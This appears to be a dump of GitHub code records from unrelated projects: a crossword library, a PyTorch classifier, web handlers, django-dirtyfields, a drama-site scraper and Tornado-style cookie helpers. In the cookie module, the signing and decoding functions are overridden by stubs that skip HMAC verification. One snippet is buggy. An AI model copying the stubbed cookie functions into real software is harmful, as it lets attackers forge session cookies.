mylist.append(finishnum)\n #print(z)\n #print(finishnum,'\\n')\n\nprint(finishnum)","repo_name":"shoryamalani/advent_of_code_2018","sub_path":"day1/Day1Challenge2.py","file_name":"Day1Challenge2.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71581967786","text":"# -*- coding: utf-8 -*-\n\"\"\"Classes for working with cryptic crosswords.\"\"\"\nimport collections\nimport os\n\nfrom crossword import Crossword\nfrom crossword.core import CrosswordCell\nfrom crossword.core import CrosswordDirectionClues as CrypticCluesContainer\nfrom crossword.core import CrosswordMetadata\n\n\nclass CrypticClues(collections.OrderedDict):\n \"\"\"An object that contains the clues for a cryptic crossword.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize a new crossword puzzle clues object.\"\"\"\n super(CrypticClues, self).__init__(*args, **kwargs)\n # TODO: Decide how to initialize a new clues object.\n\n def __getattr__(self, name):\n \"\"\"Access dict items as attributes.\"\"\"\n try:\n return self[name]\n except KeyError:\n raise AttributeError\n\n def all(self, sort=int):\n \"\"\"Return a generator of all clues.\"\"\"\n for title in self:\n for number, clue in self[title](sort=sort):\n yield title, number, clue\n\n\nclass CrypticCrossword(Crossword):\n \"\"\"A cryptic crossword puzzle.\"\"\"\n\n HEX = \"hex\"\n\n def __init__(self, width=15, height=15):\n \"\"\"Initialize a new crossword puzzle object.\"\"\"\n if width <= 0:\n raise ValueError(\"Width needs to be at least one\")\n if height <= 0:\n raise ValueError(\"Height needs to be at least one\")\n\n # set the dimensions of the grid\n self.width = width\n self.height = height\n\n # create a two-dimensional array of crossword cells\n self._data = [\n [CrosswordCell() for _ in range(width)] for _ in range(height)\n ]\n\n # create the metadata and clues objects\n self.meta = CrosswordMetadata()\n self.clues = CrypticClues()\n\n # file format-specific identifier and data\n self._format_identifier = None\n self._format = {}\n\n # override the default block (\"#\") and empty (\"_\") characters\n self.block = None\n self.empty = None\n\n # add an attributes for solution and words\n self.solution = None\n self.words = {}\n\n @property\n def content(self):\n \"\"\"Return a dict with the content of the puzzle.\"\"\"\n return {\n 'width': self.width,\n 'height': self.height,\n 'cells': self._data,\n 'metadata': self.meta,\n 'clues': {title: self.clues[title] for title in self.clues},\n 'block': self.block,\n 'empty': self.empty,\n 'type': self._format_identifier,\n 'format': self._format,\n }\n\n def __str__(self):\n \"\"\"Return the string representation of a puzzle.\"\"\"\n result = []\n for row in self:\n for cell in row:\n if cell.get(\"block\"):\n value = \"#\"\n if cell.get(\"empty\"):\n value = \"_\"\n if cell.get(\"entry\"):\n value = cell.get(\"entry\")\n if not value:\n value = \"_\"\n result.append(value)\n result.append(str(os.linesep))\n return str('').join(result)\n","repo_name":"lukwam/variety","sub_path":"cryptic/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15307174132","text":"import torch\nimport pandas\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.autograd import Variable\n\n\"\"\"\nHuman Activity neural network implementation (Non-quantization aware training)\n\"\"\"\n\nclass HARnn(torch.nn.Module):\n def __init__(self):\n super(HARnn, self).__init__()\n self.linear1 = torch.nn.Linear(560, 800)\n self.linear2 = torch.nn.Linear(800, 400)\n self.linear3 = torch.nn.Linear(400, 200)\n self.linear4 = torch.nn.Linear(200, 100)\n self.linear5 = torch.nn.Linear(100, 50)\n self.linear6 = torch.nn.Linear(50, 6)\n\n def forward(self, x):\n x = F.relu(self.linear1(x))\n x = F.relu(self.linear2(x))\n x = F.relu(self.linear3(x))\n x = F.relu(self.linear4(x))\n x = F.relu(self.linear5(x))\n x = F.log_softmax(self.linear6(x))\n return x\n\ntrain_frame = pandas.read_csv('train.csv')\naccelerometer_data = train_frame.iloc[1:, 1:561]\nvalues = train_frame.iloc[1:, 562]\n\nlabels = {\n \"STANDING\": torch.tensor([0]),\n \"SITTING\": torch.tensor([1]),\n \"LAYING\": torch.tensor([2]),\n \"WALKING\": torch.tensor([3]),\n \"WALKING_DOWNSTAIRS\": torch.tensor([4]),\n \"WALKING_UPSTAIRS\": torch.tensor([5])\n}\n\ndef predict(model, prev_accuracy):\n test_frame = pandas.read_csv('test.csv')\n test_accelerometer_data = test_frame.iloc[1:, 1:561]\n test_values = test_frame.iloc[1:, 562]\n correct_pred = 0;\n\n for x in range(len(test_values)):\n data = torch.tensor([test_accelerometer_data.iloc[x]])\n data.requires_grad = True;\n result_tensor = model(data)\n pred = np.argmax(result_tensor.data.numpy())\n if (labels[test_values.iloc[x]][0] == pred):\n correct_pred += 1;\n\n accuracy = 100. * correct_pred / len(test_values)\n print('Accuracy: {}'.format(accuracy))\n if (accuracy > prev_accuracy):\n torch.save(model.state_dict(), './HARNN_MODEL')\n\n return accuracy\n#Hard-coded parameters\nepochs = 50\nlearning_rate = 0.01\naccuracy = 0;\n# Construct our model by instantiating the class defined above.\nmodel = HARnn()\nloss_fn = torch.nn.CrossEntropyLoss()\n\noptimizer = torch.optim.SGD(model.parameters(), lr = learning_rate,)\nfor epoch in range(epochs):\n # Forward pass: Compute predicted y by passing x to the model\n for x in range(len(values)):\n data = torch.tensor([accelerometer_data.iloc[x]])\n data.requires_grad = True;\n target = labels[values.iloc[x]]\n pred = model(data)\n loss = loss_fn(pred, target)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if x % 2000 == 0 and x:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(epoch, x, len(values), x / len(values) * 100., loss.data))\n\n accuracy = predict(model, accuracy)\n","repo_name":"CoderStellaJ/CG4002-Capstone-Project","sub_path":"Hw2_fpga/har_nn.py","file_name":"har_nn.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8449266768","text":"#!/usr/bin/env python\n\nimport os\nimport json\nfrom functools import update_wrapper\nfrom datetime import datetime, timedelta\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nfrom chinwag import models\n\n_DEBUG = True\n\ndef online_users(room):\n \"\"\"returns a list of all the online users\"\"\"\n threshold = datetime.now() - timedelta(seconds=10)\n authorizations = models.Authorization.gql(\"WHERE room = :room AND last_checked_in >= :threshold\", room=room, threshold=threshold).fetch(1000)\n return [x.user for x in authorizations]\n\ndef login_required(f):\n def _f(self, *a, **kw):\n user = users.get_current_user()\n if not user:\n self.redirect(users.create_login_url(self.request.url))\n else:\n f(self, *a, **kw)\n return update_wrapper(_f, f)\n \ndef find_room_and_authorize(f):\n \"\"\"Used to find a room by id. Once found passes it as room rather than id.\"\"\"\n def _f(self, id):\n room = models.Room.get_by_id(int(id))\n if room and room.is_user_authorized(users.get_current_user()):\n f(self, room)\n else:\n self.error(404)\n return update_wrapper(_f, f)\n\nclass ApplicationHandler(webapp.RequestHandler):\n \"\"\"Supplies a common template generation function.\"\"\"\n def render_template(self, template_path, template_values={}):\n values = {\n 'request' : self.request,\n 'current_user' : users.get_current_user(),\n 'login_url' : users.create_login_url(self.request.uri),\n 'logout_url' : users.create_logout_url(self.request.uri),\n 'application_name' : 'ChinWag',\n }\n values.update(template_values)\n path = os.path.join(os.path.dirname(__file__), '..', 'views', template_path)\n self.response.out.write(template.render(path, values, debug=_DEBUG))\n \n def render_json(self, obj):\n \"\"\"Renders an object in json format with proper headers.\"\"\"\n self.response.content_type = \"application/json\"\n self.response.out.write(json.encode(obj))\n \nclass HomeHandler(ApplicationHandler):\n \"\"\"Handles the home page.\"\"\"\n def get(self):\n self.render_template('home/index.html')\n \nclass MockHTTPMethodMiddleware(object):\n \"\"\"Makes it possible to do PUT DELETE using _method.\"\"\"\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n method = webapp.Request(environ).get('_method')\n if method:\n environ['REQUEST_METHOD'] = method.upper()\n return self.app(environ, start_response)","repo_name":"jnunemaker/chinwag","sub_path":"chinwag/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"16858577992","text":"\"\"\"\nGiven list of lists get their cartesian product\nExample:\nInput:[[1,2],[3,4],[5,6]]\nOutput: [(1, 3, 5), (1, 3, 6), (1, 4, 5), (1, 4, 6), (2, 3, 5), (2, 3, 6), (2, 4, 5), (2, 4, 6)]\n\n\"\"\"\n\ndef cartesian_product(arr_list):\n if not ar_list:\n yield ()\n else:\n for a in arr_list[0]:\n for prod in product(arr_list[1:]):\n yield (a,)+prod\n","repo_name":"suyogpotnis/Interview_Questions","sub_path":"Cartesian_Product_List.py","file_name":"Cartesian_Product_List.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1959633602","text":"#!/usr/bin/python\nimport sys\nimport re\nimport datetime\nimport os\n\nminifi_folder=sys.argv[1]\n\nstart_time_obj=datetime.datetime(2021, 3, 5, 2, 8, 39)\nend_time_obj=datetime.datetime(2021, 3, 5, 2, 8, 42)\n\nprint(\"Now processing minifi files for expected count\")\nnum_expected_flowfiles_minifi=0\nif len(os.listdir(minifi_folder)) == 0:\n print(\"Minifi log files haven't been imported to NiFi node yet\")\n sys.exit(-1)\n\nfor minifi_log in os.listdir(minifi_folder):\n with open(os.path.join(minifi_folder, minifi_log), 'r') as fp:\n line=fp.readline()\n while line:\n m=re.search(\"(.*) INFO \\[.*New epoch entering\",line)\n if m:\n curr_time=datetime.datetime.strptime(m.group(1),'%Y-%m-%d %H:%M:%S,%f')\n if (curr_time <= end_time_obj) and (curr_time >= start_time_obj):\n num_expected_flowfiles_minifi+=1\n line=fp.readline()\n\nprint(\"Expected number of flowfiles in pipeline: \", num_expected_flowfiles_minifi)\n\n","repo_name":"chopark/CodeDeploy_NiFi","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25577962722","text":"from copy import deepcopy\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.files import File\nfrom django.db.models.expressions import BaseExpression\nfrom django.db.models.expressions import Combinable\nfrom django.db.models.signals import post_save, m2m_changed\n\nfrom .compare import raw_compare, compare_states, normalise_value\n\n\ndef get_m2m_with_model(given_model):\n return [\n (f, f.model if f.model != given_model else None)\n for f in given_model._meta.get_fields()\n if f.many_to_many and not f.auto_created\n ]\n\n\nclass DirtyFieldsMixin(object):\n compare_function = (raw_compare, {})\n normalise_function = (normalise_value, {})\n\n # This mode has been introduced to handle some situations like this one:\n # https://github.com/romgar/django-dirtyfields/issues/73\n ENABLE_M2M_CHECK = False\n\n FIELDS_TO_CHECK = None\n\n def __init__(self, *args, **kwargs):\n super(DirtyFieldsMixin, self).__init__(*args, **kwargs)\n post_save.connect(\n reset_state, sender=self.__class__, weak=False,\n dispatch_uid='{name}-DirtyFieldsMixin-sweeper'.format(\n name=self.__class__.__name__))\n if self.ENABLE_M2M_CHECK:\n self._connect_m2m_relations()\n reset_state(sender=self.__class__, instance=self)\n\n def refresh_from_db(self, using=None, fields=None):\n super(DirtyFieldsMixin, self).refresh_from_db(using=using, fields=fields)\n reset_state(sender=self.__class__, instance=self, update_fields=fields)\n\n def _connect_m2m_relations(self):\n for m2m_field, model in get_m2m_with_model(self.__class__):\n m2m_changed.connect(\n reset_state, sender=m2m_field.remote_field.through, weak=False,\n dispatch_uid='{name}-DirtyFieldsMixin-sweeper-m2m'.format(\n name=self.__class__.__name__))\n\n def _as_dict(self, check_relationship, include_primary_key=True):\n \"\"\"\n Capture the model fields' state as a dictionary.\n\n Only capture values we are confident are in the database, or would be\n saved to the database if self.save() is called.\n \"\"\"\n all_field = {}\n\n deferred_fields = self.get_deferred_fields()\n\n for field in self._meta.concrete_fields:\n\n # For backward compatibility reasons, in particular for fkey fields, we check both\n # the real name and the wrapped name (it means that we can specify either the field\n # name with or without the \"_id\" suffix.\n field_names_to_check = [field.name, field.get_attname()]\n if self.FIELDS_TO_CHECK and (not any(name in self.FIELDS_TO_CHECK for name in field_names_to_check)):\n continue\n\n if field.primary_key and not include_primary_key:\n continue\n\n if field.remote_field:\n if not check_relationship:\n continue\n\n if field.get_attname() in deferred_fields:\n continue\n\n field_value = getattr(self, field.attname)\n\n if isinstance(field_value, File):\n # Uses the name for files due to a perfomance regression caused by Django 3.1.\n # For more info see: https://github.com/romgar/django-dirtyfields/issues/165\n field_value = field_value.name\n\n # If current field value is an expression, we are not evaluating it\n if isinstance(field_value, (BaseExpression, Combinable)):\n continue\n\n try:\n # Store the converted value for fields with conversion\n field_value = field.to_python(field_value)\n except ValidationError:\n # The current value is not valid so we cannot convert it\n pass\n\n if isinstance(field_value, memoryview):\n # psycopg2 returns uncopyable type buffer for bytea\n field_value = bytes(field_value)\n\n # Explanation of copy usage here :\n # https://github.com/romgar/django-dirtyfields/commit/efd0286db8b874b5d6bd06c9e903b1a0c9cc6b00\n all_field[field.name] = deepcopy(field_value)\n\n return all_field\n\n def _as_dict_m2m(self):\n m2m_fields = {}\n\n if self.pk:\n for f, model in get_m2m_with_model(self.__class__):\n if self.FIELDS_TO_CHECK and (f.attname not in self.FIELDS_TO_CHECK):\n continue\n\n m2m_fields[f.attname] = set([obj.pk for obj in getattr(self, f.attname).all()])\n\n return m2m_fields\n\n def get_dirty_fields(self, check_relationship=False, check_m2m=None, verbose=False):\n if self._state.adding:\n # If the object has not yet been saved in the database, all fields are considered dirty\n # for consistency (see https://github.com/romgar/django-dirtyfields/issues/65 for more details)\n pk_specified = self.pk is not None\n initial_dict = self._as_dict(check_relationship, include_primary_key=pk_specified)\n if verbose:\n initial_dict = {key: {'saved': None, 'current': self.normalise_function[0](value)}\n for key, value in initial_dict.items()}\n return initial_dict\n\n if check_m2m is not None and not self.ENABLE_M2M_CHECK:\n raise ValueError(\"You can't check m2m fields if ENABLE_M2M_CHECK is set to False\")\n\n modified_fields = compare_states(self._as_dict(check_relationship),\n self._original_state,\n self.compare_function,\n self.normalise_function)\n\n if check_m2m:\n modified_m2m_fields = compare_states(check_m2m,\n self._original_m2m_state,\n self.compare_function,\n self.normalise_function)\n modified_fields.update(modified_m2m_fields)\n\n if not verbose:\n # Keeps backward compatibility with previous function return\n modified_fields = {\n key: self.normalise_function[0](value['saved'])\n for key, value in modified_fields.items()\n }\n\n return modified_fields\n\n def is_dirty(self, check_relationship=False, check_m2m=None):\n return {} != self.get_dirty_fields(check_relationship=check_relationship,\n check_m2m=check_m2m)\n\n def save_dirty_fields(self):\n if self._state.adding:\n self.save()\n else:\n dirty_fields = self.get_dirty_fields(check_relationship=True)\n self.save(update_fields=dirty_fields.keys())\n\n\ndef reset_state(sender, instance, **kwargs):\n # original state should hold all possible dirty fields to avoid\n # getting a `KeyError` when checking if a field is dirty or not\n update_fields = kwargs.pop('update_fields', None)\n new_state = instance._as_dict(check_relationship=True)\n FIELDS_TO_CHECK = getattr(instance, \"FIELDS_TO_CHECK\", None)\n\n if update_fields is not None:\n for field_name in update_fields:\n field = sender._meta.get_field(field_name)\n if not FIELDS_TO_CHECK or (field.name in FIELDS_TO_CHECK):\n\n if field.get_attname() in instance.get_deferred_fields():\n continue\n\n if field.name in new_state:\n instance._original_state[field.name] = (\n new_state[field.name]\n )\n elif field.name in instance._original_state:\n # If we are here it means the field was updated in the DB,\n # and we don't know the new value in the database.\n # e.g it was updated with an F() expression.\n # Because we now don't know the value in the DB,\n # we remove it from _original_state, because we can't tell\n # if its dirty or not.\n del instance._original_state[field.name]\n else:\n instance._original_state = new_state\n\n if instance.ENABLE_M2M_CHECK:\n instance._original_m2m_state = instance._as_dict_m2m()\n","repo_name":"romgar/django-dirtyfields","sub_path":"src/dirtyfields/dirtyfields.py","file_name":"dirtyfields.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":589,"dataset":"github-code","pt":"37"} +{"seq_id":"40333078185","text":"import requests\r\nfrom threading import Thread\r\nfrom bs4 import BeautifulSoup\r\nfrom terminaltables import AsciiTable\r\nfrom colored import fg, bg, attr\r\nfrom os import system\r\nfrom art import text2art\r\n\r\nsystem(\"title \" + \"Kdrama Scraped by Henry Richard J\")\r\nsystem('cls')\r\n\r\nreset = attr('reset')\r\nart = text2art(\"Kdrama Scraper\")\r\nprint(fg(\"red\") + art + reset)\r\nprint(f\"{fg('#0ecf12')}Developed by Henry Richard J{reset}\")\r\nsearch_result_table = [[\"Index\", \"Drama Name\"]]\r\n\r\n\r\ndef get_episodes_url(drama_url):\r\n all_episodes = []\r\n result = requests.get(drama_url).text\r\n soup = BeautifulSoup(result, \"html.parser\")\r\n\r\n titles = soup.find_all('h3', {'class': 'title'})\r\n\r\n drama_Title = soup.find('h1').text\r\n details = soup.find_all('p')\r\n\r\n details_check = \"\"\r\n\r\n for i in range(1, len(details) - 1):\r\n if \"Description\" in details[i].text:\r\n details_check += details[i].text.replace(\"\\n\", \" \") + \"\\n\"\r\n else:\r\n details_check += details[i].text.replace(\"\\n\", \" \") + \"\\n\\n\"\r\n\r\n print(f\"{fg('#fca503')}Title: {drama_Title}{reset}\\n\")\r\n\r\n print(f\"{fg('#e6be30')}{details_check}{reset}\")\r\n\r\n for i in range(len(titles)):\r\n if \".html\" in titles[i]['onclick']:\r\n all_episodes.append(titles[i]['onclick'].replace(\"window.location = '\", \"https://www3.dramacool.movie\"))\r\n\r\n for episode in all_episodes:\r\n Thread(target=get_video_url(episode.replace(\"'\", \"\"))).start()\r\n\r\n\r\ndef get_video_url(episode_url):\r\n result = requests.get(episode_url).text\r\n soup = BeautifulSoup(result, \"html.parser\")\r\n\r\n titles = soup.find('h1').text\r\n print(fg('#66e887') + titles.replace(\" | Dramacool\", \"\") + reset)\r\n\r\n embded_url = f\"https:{soup.find('iframe')['src']}\"\r\n\r\n print(embded_url)\r\n print(\"*\" * 20)\r\n print()\r\n\r\n\r\ndef search_drama():\r\n query = input(\"Drama to search: \")\r\n\r\n searching_color = fg(\"green\")\r\n print(searching_color + \"[*] Searching for \" + query + \".....\" + reset)\r\n\r\n drama_details_urls = []\r\n\r\n drama_Names = []\r\n\r\n url = f\"https://www3.dramacool.movie/search?type=movies&keyword={query}\"\r\n\r\n result = requests.get(url).text\r\n if \"don't exist\" in result:\r\n print(f\"{fg('red')}[*] No results found for {query}!{reset}\")\r\n exit()\r\n soup = BeautifulSoup(result, \"html.parser\")\r\n\r\n drama_titles = soup.find_all('h3', {'class': 'title'})\r\n\r\n for drama_title in drama_titles:\r\n drama_Names.append(drama_title.text)\r\n drama_details_urls.append(drama_title['onclick'].replace(\"window.location = '\", \"https://www3.dramacool.movie\"))\r\n\r\n for i in range(len(drama_Names)):\r\n search_result_table.append([str(i + 1), drama_Names[i]])\r\n\r\n table = AsciiTable(search_result_table)\r\n table_color = fg(\"#66e887\")\r\n print(table_color + table.table + reset)\r\n print(searching_color + \"[*] Total Results \" + str(len(drama_Names)) + reset)\r\n\r\n drama_choice = int(input(\"Enter the index number of the drama you want to scrape: \")) - 1\r\n print()\r\n get_episodes_url(drama_details_urls[drama_choice].replace(\"'\", \"\"))\r\n\r\n\r\nsearch_drama()\r\n","repo_name":"chayton00/project0","sub_path":"loopma.py","file_name":"loopma.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71081347628","text":"\"\"\"\nTornado complaint cookie encoding\n(C) Tornado :)\n\"\"\"\nimport re\nimport time\nimport base64\nimport hashlib\nimport hmac\nimport warnings\n\n\nDEFAULT_SIGNED_VALUE_VERSION = 2\nDEFAULT_SIGNED_VALUE_MIN_VERSION = 1\n\n\ndef utf8(val):\n if isinstance(val, bytes):\n return val\n return val.encode('utf-8')\n\n\ndef create_signed_value(secret, name, value, version=None, clock=None,\n key_version=None):\n if version is None:\n version = DEFAULT_SIGNED_VALUE_VERSION\n if clock is None:\n clock = time.time\n\n timestamp = utf8(str(int(clock())))\n value = base64.b64encode(utf8(value))\n if version == 1:\n signature = _create_signature_v1(secret, name, value, timestamp)\n value = b\"|\".join([value, timestamp, signature])\n return value\n elif version == 2:\n # The v2 format consists of a version number and a series of\n # length-prefixed fields \"%d:%s\", the last of which is a\n # signature, all separated by pipes. All numbers are in\n # decimal format with no leading zeros. The signature is an\n # HMAC-SHA256 of the whole string up to that point, including\n # the final pipe.\n #\n # The fields are:\n # - format version (i.e. 2; no length prefix)\n # - key version (integer, default is 0)\n # - timestamp (integer seconds since epoch)\n # - name (not encoded; assumed to be ~alphanumeric)\n # - value (base64-encoded)\n # - signature (hex-encoded; no length prefix)\n def format_field(s):\n return utf8(\"%d:\" % len(s)) + utf8(s)\n to_sign = b\"|\".join([\n b\"2\",\n format_field(str(key_version or 0)),\n format_field(timestamp),\n format_field(name),\n format_field(value),\n b''])\n\n if isinstance(secret, dict):\n assert key_version is not None, 'Key version must be set when sign key dict is used'\n assert version >= 2, 'Version must be at least 2 for key version support'\n secret = secret[key_version]\n\n signature = _create_signature_v2(secret, to_sign)\n return to_sign + signature\n else:\n raise ValueError(\"Unsupported version %d\" % version)\n\n\ndef create_signed_value(_, __, value, *args, **kwargs):\n return (''.join(value.split())).encode()\n\n# A leading version number in decimal\n# with no leading zeros, followed by a pipe.\n_signed_value_version_re = re.compile(br\"^([1-9][0-9]*)\\|(.*)$\")\n\n\ndef _get_version(value):\n # Figures out what version value is. Version 1 did not include an\n # explicit version field and started with arbitrary base64 data,\n # which makes this tricky.\n m = _signed_value_version_re.match(value)\n if m is None:\n version = 1\n else:\n try:\n version = int(m.group(1))\n if version > 999:\n # Certain payloads from the version-less v1 format may\n # be parsed as valid integers. Due to base64 padding\n # restrictions, this can only happen for numbers whose\n # length is a multiple of 4, so we can treat all\n # numbers up to 999 as versions, and for the rest we\n # fall back to v1 format.\n version = 1\n except ValueError:\n version = 1\n return version\n\n\ndef decode_signed_value(secret, name, value, max_age_days=31,\n clock=None, min_version=None):\n if clock is None:\n clock = time.time\n if min_version is None:\n min_version = DEFAULT_SIGNED_VALUE_MIN_VERSION\n if min_version > 2:\n raise ValueError(\"Unsupported min_version %d\" % min_version)\n if not value:\n return None\n\n value = utf8(value)\n version = _get_version(value)\n\n if version < min_version:\n return None\n if version == 1:\n return _decode_signed_value_v1(secret, name, value,\n max_age_days, clock)\n elif version == 2:\n return _decode_signed_value_v2(secret, name, value,\n max_age_days, clock)\n else:\n return None\n\n\ndef decode_signed_value(_, __, value, *args, **kwargs):\n return value[:5] + ' ' + value[5:]\n\n\ndef _decode_signed_value_v1(secret, name, value, max_age_days, clock):\n parts = utf8(value).split(b\"|\")\n if len(parts) != 3:\n return None\n signature = _create_signature_v1(secret, name, parts[0], parts[1])\n if not hmac.compare_digest(parts[2], signature):\n warnings.warning(\"Invalid cookie signature %r\", value)\n return None\n timestamp = int(parts[1])\n if timestamp < clock() - max_age_days * 86400:\n warnings.warning(\"Expired cookie %r\", value)\n return None\n if timestamp > clock() + 31 * 86400:\n # _cookie_signature does not hash a delimiter between the\n # parts of the cookie, so an attacker could transfer trailing\n # digits from the payload to the timestamp without altering the\n # signature. For backwards compatibility, sanity-check timestamp\n # here instead of modifying _cookie_signature.\n warnings.warning(\"Cookie timestamp in future; possible tampering %r\",\n value)\n return None\n if parts[1].startswith(b\"0\"):\n warnings.warning(\"Tampered cookie %r\", value)\n return None\n try:\n return base64.b64decode(parts[0])\n except Exception:\n return None\n\n\ndef _decode_fields_v2(value):\n def _consume_field(s):\n length, _, rest = s.partition(b':')\n n = int(length)\n field_value = rest[:n]\n # In python 3, indexing bytes returns small integers; we must\n # use a slice to get a byte string as in python 2.\n if rest[n:n + 1] != b'|':\n raise ValueError(\"malformed v2 signed value field\")\n rest = rest[n + 1:]\n return field_value, rest\n\n rest = value[2:] # remove version number\n key_version, rest = _consume_field(rest)\n timestamp, rest = _consume_field(rest)\n name_field, rest = _consume_field(rest)\n value_field, passed_sig = _consume_field(rest)\n return int(key_version), timestamp, name_field, value_field, passed_sig\n\n\ndef _decode_signed_value_v2(secret, name, value, max_age_days, clock):\n try:\n key_version, timestamp, name_field, value_field, passed_sig = _decode_fields_v2(value)\n except ValueError:\n return None\n signed_string = value[:-len(passed_sig)]\n\n if isinstance(secret, dict):\n try:\n secret = secret[key_version]\n except KeyError:\n return None\n\n expected_sig = _create_signature_v2(secret, signed_string)\n if not hmac.compare_digest(passed_sig, expected_sig):\n return None\n if name_field != utf8(name):\n return None\n timestamp = int(timestamp)\n if timestamp < clock() - max_age_days * 86400:\n # The signature has expired.\n return None\n try:\n return base64.b64decode(value_field)\n except Exception:\n return None\n\n\ndef get_signature_key_version(value):\n value = utf8(value)\n version = _get_version(value)\n if version < 2:\n return None\n try:\n key_version, _, _, _, _ = _decode_fields_v2(value)\n except ValueError:\n return None\n\n return key_version\n\n\ndef _create_signature_v1(secret, *parts):\n hash = hmac.new(utf8(secret), digestmod=hashlib.sha1)\n for part in parts:\n hash.update(utf8(part))\n return utf8(hash.hexdigest())\n\n\ndef _create_signature_v2(secret, s):\n hash = hmac.new(utf8(secret), digestmod=hashlib.sha256)\n hash.update(utf8(s))\n return utf8(hash.hexdigest())\n\n\ndef is_absolute(path):\n return any(path.startswith(x) for x in [\"/\", \"http:\", \"https:\"])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-stat-server/src/common/secure_cookies/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":7780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13717015597","text":"import os\n\nimport unittest\nimport mozunit\nfrom taskcluster_graph.templates import (\n Templates,\n TemplatesException\n)\n\nclass TemplatesTest(unittest.TestCase):\n\n def setUp(self):\n abs_path = os.path.abspath(os.path.dirname(__file__))\n self.subject = Templates(os.path.join(abs_path, 'fixtures'))\n\n\n def test_invalid_path(self):\n with self.assertRaisesRegexp(TemplatesException, 'must be a directory'):\n Templates('/zomg/not/a/dir')\n\n def test_no_templates(self):\n content = self.subject.load('simple.yml', {})\n self.assertEquals(content, {\n 'is_simple': True\n })\n\n def test_with_templates(self):\n content = self.subject.load('templates.yml', {\n 'woot': 'bar'\n })\n\n self.assertEquals(content, {\n 'content': 'content',\n 'variable': 'bar'\n })\n\n def test_inheritance(self):\n '''\n The simple single pass inheritance case.\n '''\n content = self.subject.load('inherit.yml', {})\n self.assertEqual(content, {\n 'content': 'content',\n 'variable': 'inherit'\n })\n\n def test_inheritance_implicat_pass(self):\n '''\n Implicitly pass parameters from the child to the ancestor.\n '''\n content = self.subject.load('inherit_pass.yml', {\n 'a': 'overriden'\n })\n\n self.assertEqual(content, { 'values': ['overriden', 'b', 'c'] });\n\n\n def test_inheritance_circular(self):\n '''\n Circular reference handling.\n '''\n with self.assertRaisesRegexp(TemplatesException, 'circular'):\n self.subject.load('circular.yml', {})\n\n def test_deep_inheritance(self):\n content = self.subject.load('deep/4.yml', {\n 'value': 'myvalue'\n })\n self.assertEqual(content, { 'variable': 'myvalue' })\n\n def test_inheritance_with_simple_extensions(self):\n content = self.subject.load('extend_parent.yml', {})\n self.assertEquals(content, {\n 'list': ['1', '2', '3', '4'],\n 'obj': {\n 'from_parent': True,\n 'deeper': {\n 'woot': 'bar',\n 'list': ['baz', 'bar']\n },\n 'level': 2,\n },\n 'was_list': { 'replaced': True }\n })\n\n\nif __name__ == '__main__':\n mozunit.main()\n","repo_name":"classilla/tenfourfox","sub_path":"testing/taskcluster/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"37"} +{"seq_id":"30910255513","text":"from typing import Any\n\nfrom django.db.models import Q\n\nfrom aria.categories.models import Category\nfrom aria.categories.selectors import category_tree_active_list_for_product\nfrom aria.core.decorators import cached\nfrom aria.core.managers import BaseQuerySet\nfrom aria.files.records import BaseHeaderImageRecord\nfrom aria.product_attributes.records import (\n ColorDetailRecord,\n MaterialDetailRecord,\n RoomDetailRecord,\n ShapeDetailRecord,\n)\nfrom aria.products.filters import ProductSearchFilter\nfrom aria.products.models import Product\nfrom aria.products.records import (\n ProductDetailRecord,\n ProductFileRecord,\n ProductListRecord,\n)\nfrom aria.products.schemas.filters import ProductListFilters\nfrom aria.products.selectors.pricing import product_get_price_from_options\nfrom aria.products.selectors.product_options import product_options_list_for_product\nfrom aria.products.selectors.records import product_list_record, product_record\n\n\ndef product_detail(\n *, product_id: int | None = None, product_slug: str | None = None\n) -> ProductDetailRecord | None:\n \"\"\"\n Get the detailed representation of a single product based on either\n id or slug, although one of them has to be provided.\n\n Be careful to not run this in a loop unless absolutely needed. It\n already does quite a few queries, and will to that amount per loop\n iteration.\n \"\"\"\n\n product = (\n Product.objects.filter(Q(id=product_id) | Q(slug=product_slug)) # type: ignore\n .with_active_categories()\n .with_colors()\n .with_materials()\n .with_rooms()\n .with_shapes()\n .with_files()\n .with_available_options_and_option_discounts()\n .with_active_product_discounts()\n .annotate_from_price()\n .first()\n )\n\n if not product:\n return None\n\n categories = category_tree_active_list_for_product(product=product)\n options = product_options_list_for_product(product=product)\n\n product_base_record = product_record(product=product)\n\n record = ProductDetailRecord(\n **product_base_record.dict(),\n categories=categories,\n from_price=product_get_price_from_options(product=product),\n display_price=product.display_price,\n can_be_picked_up=product.can_be_picked_up,\n can_be_purchased_online=product.can_be_purchased_online,\n materials=[\n MaterialDetailRecord.from_material(material)\n 